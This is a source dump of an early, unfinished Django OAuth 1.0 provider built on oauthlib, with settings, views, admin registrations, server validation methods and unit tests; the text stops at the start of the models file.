craigbruce/django-oauth
|
https://github.com/craigbruce/django-oauth
|
0eab80615858d3eb7bd1d7dc5d6edb3e6c5402e0
|
1427ab228ed65a1848038dbd62b96809ed2f45ba
|
e67dfb83532005ac415d1c5b083dc952770ca4e5
|
refs/heads/master
| 2020-12-30T10:36:35.284313 | 2013-07-01T17:15:51 | 2013-07-01T17:15:51 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6184346079826355,
"alphanum_fraction": 0.6230689883232117,
"avg_line_length": 22.119047164916992,
"blob_id": "66cc54b107dd28d6bf8264c43f619d8f9c891946",
"content_id": "45b5bab52828b7ee55d9f62e587b0b93893edaf6",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1942,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 84,
"path": "/project/settings.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "# Django settings based on 1.4.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Test User', '[email protected]'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite',\n }\n}\n\nTIME_ZONE = 'America/Denver'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'bjve4v4s%c#-#a#1zx8gca$pk(!+-n8f_sp-b+nb0@ticyp@n%'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'oauth',\n 'south',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n"
},
{
"alpha_fraction": 0.5888445973396301,
"alphanum_fraction": 0.5952191352844238,
"avg_line_length": 28.880952835083008,
"blob_id": "f7e3943164ad95245663dc061d5990af0b47fc93",
"content_id": "6f5c47f230fd598c27b58d28e27252e53f46ed38",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1255,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 42,
"path": "/setup.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "import os\nfrom setuptools import setup, find_packages\n\ndef read_file(filename):\n \"\"\"Read a file into a string\"\"\"\n path = os.path.abspath(os.path.dirname(__file__))\n filepath = os.path.join(path, filename)\n try:\n return open(filepath).read()\n except IOError:\n return ''\n\nsetup(\n name='django-oauth',\n version=__import__('oauth').__version__,\n author='Craig Bruce',\n author_email='[email protected]',\n description=u' '.join(__import__('oauth').__doc__.splitlines()).strip(),\n license='BSD',\n keywords='django oauth provider',\n url='https://github.com/craigbruce/django-oauthlib',\n packages=find_packages(),\n include_package_data=True,\n long_description=read_file('README.rst'),\n install_requires = ['docutils>=0.3'],\n test_suite=\"runtests.runtests\",\n zip_safe=False,\n requires=[\n 'django(>=1.4)',\n 'oauthlib(>=0.3.0)',\n ],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: BSD License',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n"
},
{
"alpha_fraction": 0.746666669845581,
"alphanum_fraction": 0.746666669845581,
"avg_line_length": 14.199999809265137,
"blob_id": "af2044a5df52f8bf3b96b87bc1e45da05f9ef1f9",
"content_id": "a3903c891d614ca671dfce6f8ca0b683a06c2ca5",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 75,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/tests/run_tests.sh",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nexport PYTHONPATH=../:$PYTHONPATH\n\npython manage.py test oauth"
},
{
"alpha_fraction": 0.5461538434028625,
"alphanum_fraction": 0.5461538434028625,
"avg_line_length": 31.5,
"blob_id": "6754201a06a162d527f2e4e313b6f0a13a11fd17",
"content_id": "bf4f7b91723f78bde26ecc318482a7ca3afdbae8",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 130,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 4,
"path": "/CONTRIBUTING.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "Guidelines for contributing to django-oauth\n===========================================\n\nCommon sense will prevail in most cases.\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 8,
"blob_id": "e478059b74fb4df4ffd88697b3a351158b0e9703",
"content_id": "aacf2bbcaa605e56153a75bbfe752989b946df50",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 9,
"license_type": "permissive",
"max_line_length": 8,
"num_lines": 1,
"path": "/AUTHORS.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "* Michael Mior\n"
},
{
"alpha_fraction": 0.6869712471961975,
"alphanum_fraction": 0.6886633038520813,
"avg_line_length": 26.488372802734375,
"blob_id": "008580a49100300eb31a2fdbc8ea6d8a5c6429df",
"content_id": "d4d93d88b6923604c43113f3ed75307ff64beb06",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1182,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 43,
"path": "/README.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "django-oauthlib\n===============\n\n.. note::\n\tGiven a flurry of other django oauth related projects having cropped up. I suggest you try one of them out. `Django OAuth Toolkit <https://github.com/evonove/django-oauth-toolkit>`_ looks very promising, for example.\n\n\nAn OAuth provider built on `oauthlib <https://github.com/idan/oauthlib/>`_ wrapped with Django. Currently targeting OAuth 1.0. This project is under (slow) development.\n\n.. image:: https://travis-ci.org/craigbruce/django-oauth.png?branch=master\n :target: https://travis-ci.org/craigbruce/django-oauth\n\nInstallation\n------------\n\nDirect from GitHub using ``pip install git+https://github.com/craigbruce/django-oauthlib.git#egg=django-oauthlib``. django-oauthlib will be made available on PyPI after more development.\n\nIn your Django ``settings.py`` add ``oauth`` to your ``INSTALLED_APPS``::\n\n INSTALLED_APPS = (\n 'django.contrib.auth',\n ...\n 'oauth',\n )\n\nUsage\n-----\n\nTo follow.\n\nTests\n-----\n\nCreate a virtualenv first, then::\n\n pip install -U -r requirements.txt\n cd tests\n ./run_tests.sh\n\nLicense\n-------\n\ndjango-oauthlib is licensed under the BSD license, see LICENSE.\n"
},
{
"alpha_fraction": 0.5830363631248474,
"alphanum_fraction": 0.5930149555206299,
"avg_line_length": 22.779661178588867,
"blob_id": "62dacb3622893da00f596731fcda6dc82d84b0d4",
"content_id": "e1a08217451d93bf272e47f0da36647c6a8841ac",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1403,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 59,
"path": "/oauth/views.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\n# Django also has an urlencode method\nfrom oauthlib.oauth1.rfc5849.utils import urlencode\nfrom oauth.server import OAuthServer\n\n\ndef temporary_credentials_request(request):\n\n if request.META['HTTP_AUTHORIZATION']:\n t = 'Auth present'\n else:\n t = 'missing'\n\n# response = urlencode({\n# 'realm': 1,\n# 'oauth_consumer_key': 2,\n# 'oauth_signature_method': 3,\n# 'oauth_timestamp': 4,\n# 'oauth_nonce': 5,\n# 'oauth_callback': 6,\n# 'oauth_signature': 7\n# })\n\n authorized = OAuthServer.verify_request(\n request.build_absolute_uri(),\n request.method,\n request.body,\n request.META,\n require_resource_owner=False\n )\n# authorized = OAuthServer.verify_request(\n# uri,\n# http_method,\n# body,\n# headers,\n# require_resource_owner=False\n# )\n\n# response = urlencode({\n# 'oauth_token': 1,\n# 'oauth_token_secret': 2,\n# 'oauth_callback_confirmed': 'true'\n# })\n\n #response = \"%s %s\" % request.META['Authorization'],\n # request.META['QUERY_STRING']\n response = \"%s\" % t\n\n return HttpResponse(response)\n #return HttpResponse(response,\n # content_type='application/x-www-form-urlencoded')\n\n\ndef user_authorization(request):\n pass\n\n\ndef token_request(request):\n pass\n"
},
{
"alpha_fraction": 0.7038745284080505,
"alphanum_fraction": 0.7038745284080505,
"avg_line_length": 28.29729652404785,
"blob_id": "ee0e023f296813974203ddd51cc949e0142c6220",
"content_id": "d3c46eb012ae536faa2f172b1631133c047c6579",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 37,
"path": "/oauth/admin.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom oauth.models import ClientCredential, Nonce, TokenType, Token,\\\n Resource, Realm\n\n\nclass ClientCredentialsOptions(admin.ModelAdmin):\n list_display = ('id', 'user', 'key', 'secret', 'name', 'callback')\n\n\nclass NonceOptions(admin.ModelAdmin):\n list_display = ('id', 'key', 'nonce', 'request_token', 'access_token',\n 'timestamp')\n\n\nclass TokenTypeOptions(admin.ModelAdmin):\n list_display = ('id', 'token_type')\n\n\nclass TokenOptions(admin.ModelAdmin):\n list_display = ('id', 'token_type', 'resource', 'client_key',\n 'key', 'secret', 'timestamp')\n\n\nclass ResourceOptions(admin.ModelAdmin):\n list_display = ('id', 'name', 'url')\n\n\nclass RealmOptions(admin.ModelAdmin):\n list_display = ('name', 'client_key')\n\n\nadmin.site.register(ClientCredential, ClientCredentialsOptions)\nadmin.site.register(Nonce, NonceOptions)\nadmin.site.register(TokenType, TokenTypeOptions)\nadmin.site.register(Token, TokenOptions)\nadmin.site.register(Resource, ResourceOptions)\nadmin.site.register(Realm, RealmOptions)\n"
},
{
"alpha_fraction": 0.5849056839942932,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 17,
"blob_id": "b3b123eb9e7b7402dabe347047d69959dc827ba1",
"content_id": "35a59347c48cc6040237cfc8b98eef03527d3c22",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 3,
"path": "/oauth/__init__.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "\"An oauth provider for Django\"\n\n__version__ = '0.0.1'"
},
{
"alpha_fraction": 0.5290108919143677,
"alphanum_fraction": 0.5315420627593994,
"avg_line_length": 27.375690460205078,
"blob_id": "0aaa0d84d974a5ee79ce4acf1048eb3f9ccf9d76",
"content_id": "56cd0cb031ebc64d6445d733bc3689905fd4a97f",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5136,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 181,
"path": "/oauth/server.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.core.exceptions import ObjectDoesNotExist\nfrom oauthlib.common import safe_string_equals\nfrom oauthlib.oauth1.rfc5849 import Server\nfrom oauth.models import ClientCredential, Nonce, Token, Realm, Resource\n\n\nclass OAuthServer(Server):\n\n @property\n def dummy_client(self):\n return u'dummy_client'\n\n @property\n def dummy_request_token(self):\n return u'dummy_request_token'\n\n @property\n def dummy_access_token(self):\n return u'dummy_access_token'\n\n def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,\n request_token=None, access_token=None):\n\n try:\n c = ClientCredential.objects.get(key=client_key)\n except ObjectDoesNotExist:\n return False\n n = Nonce.objects.filter(key=c)\n if n.exists():\n #client_key has been used before\n matches = n.filter(nonce=nonce, timestamp=timestamp,\n request_token=request_token,\n access_token=access_token)\n if matches.exists():\n # nonce/timestamp/request_token/access_token\n # combo have been used before\n return False\n\n Nonce.objects.create(nonce=nonce, timestamp=timestamp,\n key=c, request_token=request_token,\n access_token=access_token)\n\n key = None\n if request_token:\n key = request_token\n elif access_token:\n key = access_token\n\n return client_key, timestamp, nonce, key\n\n def validate_client_key(self, client_key):\n\n try:\n c = ClientCredential.objects.get(key=client_key)\n return c.key\n except ObjectDoesNotExist:\n return False\n\n def validate_request_token(self, client_key, request_token):\n\n try:\n t = Token.objects.filter(client_key__key=client_key,\n key=request_token, token_type=1)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return True\n else:\n return False\n\n def validate_access_token(self, client_key, access_token):\n\n try:\n t = Token.objects.filter(client_key__key=client_key,\n key=access_token, token_type=2)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return True\n else:\n return False\n\n def validate_redirect_uri(self, client_key, redirect_uri):\n\n try:\n c = ClientCredential.objects.filter(key=client_key,\n callback=redirect_uri)\n except ObjectDoesNotExist:\n return False\n\n if c.exists():\n return True\n else:\n return False\n\n def validate_realm(self, client_key, access_token,\n uri=None, required_realm=None):\n\n if required_realm:\n try:\n r = Realm.objects.filter(\n client_key__key=client_key,\n access_token=access_token,\n name=required_realm)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return required_realm\n else:\n return False\n else:\n try:\n r = Realm.objects.filter(url=uri)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return r[0].url\n else:\n return False\n\n def validate_requested_realm(self, client_key, realm):\n\n try:\n r = Realm.objects.filter(name=realm, client_key__key=client_key)\n except ObjectDoesNotExist:\n return False\n\n if r.exists():\n return realm\n else:\n return False\n\n# def validate_verifier(self, client_key, access_token, verifier):\n#\n# return safe_string_equals(verifier, (client_key, access_token))\n\n def get_client_secret(self, client_key):\n\n try:\n c = ClientCredential.objects.filter(key=client_key)\n except ObjectDoesNotExist:\n return False\n\n if c.exists():\n return c[0].secret\n else:\n False\n\n def get_request_token_secret(self, client_key, request_token):\n\n try:\n t = Token.objects.filter(\n client_key__key=client_key,\n key=request_token,\n token_type=1)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return 
t[0].secret\n else:\n False\n\n def get_access_token_secret(self, client_key, access_token):\n\n try:\n t = Token.objects.filter(\n client_key__key=client_key,\n key=access_token,\n token_type=2)\n except ObjectDoesNotExist:\n return False\n\n if t.exists():\n return t[0].secret\n else:\n False\n"
},
{
"alpha_fraction": 0.5911041498184204,
"alphanum_fraction": 0.6073351502418518,
"avg_line_length": 39.29874038696289,
"blob_id": "0a13f7ce0a8955050f6a2e0699219c97f58b8547",
"content_id": "c9b37738ac7cdae09eec17971405377b67ba505c",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12815,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 318,
"path": "/oauth/tests.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom oauth.models import ClientCredential, Nonce, Token, Realm\nfrom oauth.server import OAuthServer\n\n\nclass OAuthServerTest(TestCase):\n fixtures = ['initial_data.json', 'test_user.json', 'test_entries.json']\n\n def setUp(self):\n super(OAuthServerTest, self).setUp()\n\n # Credentials\n self.user = User.objects.get(pk=1)\n\n # Object to test on\n self.clientcredentials = ClientCredential.objects.get(pk=1)\n self.oauthserver = OAuthServer()\n\n # Nose setting for long diffs\n #self.maxDiff = None\n\n def test_validate_timestamp_and_nonce(self):\n self.nonce = Nonce.objects.get(pk=1)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, self.nonce.timestamp,\n self.nonce.nonce))\n #New timestamp\n self.assertEquals(\n self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce.nonce),\n (self.clientcredentials.key, 987654322,\n self.nonce.nonce, None))\n #New nonce\n self.assertEquals(\n self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce.timestamp, 'abc'),\n (self.clientcredentials.key, self.nonce.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce.timestamp, self.nonce.nonce))\n\n def test_validate_timestamp_and_nonce_request_token(self):\n self.nonce_request_token = Nonce.objects.get(pk=2)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n #New timestamp\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token),\n (self.clientcredentials.key, 987654322,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654323,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token),\n (self.clientcredentials.key, 987654323,\n self.nonce_request_token.nonce, None))\n #New nonce\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token),\n (self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', self.nonce_request_token.request_token),\n (self.clientcredentials.key,\n self.nonce_request_token.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce_request_token.timestamp,\n self.nonce_request_token.nonce,\n self.nonce_request_token.request_token))\n\n def test_validate_timestamp_and_nonce_access_token(self):\n self.nonce_access_token = Nonce.objects.get(pk=3)\n #Credentials already used\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 
self.nonce_access_token.nonce,\n None, self.nonce_access_token.access_token))\n #New timestamp\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654322,\n self.nonce_access_token.nonce, None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key, 987654322,\n self.nonce_access_token.nonce,\n self.nonce_access_token.access_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key, 987654323,\n self.nonce_access_token.nonce, None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key, 987654323,\n self.nonce_access_token.nonce, None))\n #New nonce\n self.assertEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None, self.nonce_access_token.access_token),\n (self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', self.nonce_access_token.access_token))\n self.assertNotEquals(self.oauthserver.validate_timestamp_and_nonce(\n self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None,\n self.nonce_access_token.access_token),\n (self.clientcredentials.key,\n self.nonce_access_token.timestamp,\n 'abc', None))\n #Incorrect client key\n self.assertFalse(self.oauthserver.validate_timestamp_and_nonce(\n 'm7UQ0_n8M0vUNmdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.nonce_access_token.timestamp,\n self.nonce_access_token.nonce,\n None, self.nonce_access_token.access_token))\n\n def test_validate_client_key(self):\n self.assertEquals(\n self.oauthserver.validate_client_key(self.clientcredentials.key),\n self.clientcredentials.key)\n self.assertFalse(self.oauthserver.validate_client_key('notavalidkey'))\n\n def test_validate_request_token(self):\n self.token = Token.objects.get(pk=1)\n self.assertTrue(\n self.oauthserver.validate_request_token(\n self.clientcredentials.key, self.token.key))\n self.assertFalse(\n self.oauthserver.validate_request_token(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.token.key))\n self.assertFalse(\n self.oauthserver.validate_request_token(\n self.clientcredentials.key, 'm7UQ0_n8M0vUNmd'))\n\n def test_validate_access_token(self):\n self.token = Token.objects.get(pk=2)\n self.assertTrue(\n self.oauthserver.validate_access_token(\n self.clientcredentials.key, self.token.key))\n self.assertFalse(\n self.oauthserver.validate_access_token(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.token.key))\n self.assertFalse(\n self.oauthserver.validate_access_token(\n self.clientcredentials.key, 'm7UQ0_n8M0vUNmd'))\n\n def test_validate_redirect_uri(self):\n self.assertTrue(\n self.oauthserver.validate_redirect_uri(\n self.clientcredentials.key,\n self.clientcredentials.callback))\n self.assertFalse(\n self.oauthserver.validate_redirect_uri(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=',\n self.clientcredentials.callback))\n self.assertFalse(\n self.oauthserver.validate_redirect_uri(\n self.clientcredentials.key,\n 'http://www.example.com/ready'))\n\n def test_validate_realm(self):\n self.realm = Realm.objects.get(pk=2)\n self.assertEquals(\n self.oauthserver.validate_realm(\n self.clientcredentials.key,\n self.realm.access_token,\n None, self.realm.name),\n self.realm.name)\n self.realm = Realm.objects.get(pk=3)\n self.assertEquals(\n self.oauthserver.validate_realm(\n self.clientcredentials.key,\n self.realm.access_token,\n self.realm.url, None),\n self.realm.url)\n\n def test_validate_requested_realm(self):\n self.realm = Realm.objects.get(pk=1)\n 
self.assertEquals(\n self.oauthserver.validate_requested_realm(\n self.clientcredentials.key, self.realm.name),\n self.realm.name)\n self.assertFalse(\n self.oauthserver.validate_requested_realm(\n 'mdwCgQ4kMCRAfO5A7l6pN4QEOePAE4=', self.realm.name))\n self.assertFalse(\n self.oauthserver.validate_requested_realm(\n self.clientcredentials.key, 'wrong_realm_name'))\n\n# def test_validate_verifier(self):\n# self.token = Token.objects.get(pk=2)\n# self.assertEquals(\n# self.oauthserver.validate_verifier(\n# self.clientcredentials.key,\n# self.token.key,\n# 'dfg'),\n# 'dfg')\n\n def test_get_client_secret(self):\n self.assertEquals(\n self.oauthserver.get_client_secret(self.clientcredentials.key),\n self.clientcredentials.secret)\n self.assertFalse(\n self.oauthserver.get_client_secret('Vc_89DGdxcBShDhXGkDKJuc8='))\n\n def test_get_request_token_secret(self):\n self.token = Token.objects.get(pk=1)\n self.assertEquals(\n self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, self.token.key),\n self.token.secret)\n self.assertFalse(\n self.oauthserver.get_request_token_secret(\n 'Vc_89DGdxcBShDhXGkDKJuc8=', self.token.key))\n self.assertFalse(\n self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, 'QhYz2iCdGS8xYwUegfSUHF'))\n\n def test_get_access_token_secret(self):\n self.token = Token.objects.get(pk=2)\n self.assertEquals(self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, self.token.key),\n self.token.secret)\n self.assertFalse(self.oauthserver.get_request_token_secret(\n 'Vc_89DGdxcBShDhXGkDKJuc8=', self.token.key))\n self.assertFalse(self.oauthserver.get_request_token_secret(\n self.clientcredentials.key, 'QhYz2iCdGS8xYwUegfSUHF'))\n\n#class TemporaryCredentialsRequestTest(TestCase):\n# fixtures = ['test_entries.json']\n#\n# def setUp(self):\n# super(TemporaryCredentialsRequestTest, self).setUp()\n#\n# # Credentials\n# self.username = 'testuser'\n# self.password = 'pass'\n# self.user = User.objects.create_user(\n# self.username,\n# '[email protected]',\n# self.password\n# )\n#\n# # Object to test on\n# self.clientcredentials = ClientCredential.objects.get(pk=1)\n#\n# # Nose setting for long diffs\n# self.maxDiff = None\n#\n# def testStuff(self):\n#\n# c = Client(\n# self.clientcredentials.key,\n# callback_uri=self.clientcredentials.callback\n# )\n#\n# uri, headers, body = c.sign(u'http://127.0.0.1:8001/initiate/')\n\n# #TODO nonce/timestamp/signature will change\n# self.assertEqual(\n# headers,\n# {\n# u'Authorization': u'OAuth oauth_nonce='\n# u'\"110880830699442379541341263567\",'\n# u'oauth_timestamp=\"1341263567\", oauth_version=\"1.0\",'\n# u'oauth_signature_method=\"HMAC-SHA1\",'\n# u'oauth_consumer_key=self.clientcredentials.key,'\n# u'oauth_callback=self.clientcredentials.callback,'\n# u'oauth_signature=\"1emEeMqMx1vgjKEwdwyrz57%2FyTE%3D\"',\n# }\n# )\n\n# s = OAuthServer()\n# self.assertTrue(s.verify_request(uri, body=body, headers=headers))\n\n# dc = DjClient()\n# response = dc.post(\n# '/oauth/initiate/',\n# HTTP_AUTHORIZATION=headers['Authorization']\n# )\n# print response.status_code\n# print response.content\n\n #c = Client()\n\n# response = c.post('/oauth/initiate/', {\n# 'realm': 'test',\n# 'oauth_consumer_key': self.client.key,\n# 'oauth_signature_method': 'HMAC-SHA1',\n# 'oauth_timestamp': now,\n# 'oauth_nonce': nonce,\n# 'oauth_callback': self.client.callback,\n# 'oauth_signature': 'sign',\n# 'oauth_version': '1.0',\n# }, Authorization='OAuth')\n#\n# print response.status_code\n# print response.content\n"
},
{
"alpha_fraction": 0.5911111235618591,
"alphanum_fraction": 0.6177777647972107,
"avg_line_length": 20.380952835083008,
"blob_id": "3f46731e17bc88fb16b2ea2cedffc79e283ad2eb",
"content_id": "c42064b286654d340332b810145514180f1780e5",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 21,
"path": "/docs/source/index.rst",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": ".. django-oauthlib documentation master file, created by\n sphinx-quickstart on Tue Sep 4 14:16:10 2012.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to django-oauthlib's documentation!\n===========================================\n\nContents:\n\n.. toctree::\n :maxdepth: 2\n\n\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n"
},
{
"alpha_fraction": 0.6582809090614319,
"alphanum_fraction": 0.6758909821510315,
"avg_line_length": 28.44444465637207,
"blob_id": "0e711aa7cae5c012c808f10d03186c79c9cde984",
"content_id": "d88777404e13c28bfab8259a10c70017c676c8af",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2385,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 81,
"path": "/oauth/models.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
